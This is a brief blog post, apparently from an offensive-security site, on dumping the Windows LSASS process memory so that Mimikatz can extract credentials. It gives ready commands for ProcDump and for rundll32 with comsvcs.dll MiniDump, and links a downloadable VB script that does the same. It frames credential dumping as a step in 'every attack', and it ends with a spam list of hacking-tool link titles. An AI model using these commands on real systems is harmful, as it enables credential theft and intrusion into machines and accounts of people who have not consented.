LSASS Dumping Methods ( For Mimikatz )

In every attack we need to get the windows credentials, this super important task. We need to target "LSASS.EXE" process and dump the process memory so that we can use it for extracting credentials using Mimikatz.


Here are some of the important methods,

Using ProcDump :

1. Favorite method of dumping is using "procdump.exe". This tool is from Microsoft Pstools
2. Download ProcDump.exe and upload in on remote system
3. Command : "procdump -ma lsass.exe lsass.dmp"


Using VB Script :

Download script from here :
https://drive.google.com/open?id=1jwy40ykrdEHWB1sddZ-Q5USDX9OOPOPp

rundll32 Command :

Essentially previous method VBS script is using following command for dumping Lsass.exe process

rundll32 C:\windows\system32\comsvcs.dll, MiniDump 992 C:\Users\Public\lsass.bin full

So in case you do not have VB Script with you still you can fire-up the command and dump LSASS process.

This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

More articles

1. Nsa Hacker Tools
2. What Is Hacking Tools
3. Best Hacking Tools 2019
4. Hacking Tools 2020
5. Hacker Tools For Ios
6. Pentest Tools Online
7. Hacker
8. Pentest Tools Github
9. Hacking Tools Software
10. Pentest Recon Tools
11. Hacking Tools 2019
12. Hacking Tools For Windows Free Download
13. Hacking Tools Free Download
14. Hacking Tools And Software
15. Pentest Tools Download
16. Best Hacking Tools 2020
17. Hacker Search Tools
18. Hack And Tools
19. Game Hacking
20. Pentest Reporting Tools
21. Hack Tools Github
22. Best Hacking Tools 2019
23. Pentest Box Tools Download
24. Nsa Hacker Tools
25. Underground Hacker Sites
26. Ethical Hacker Tools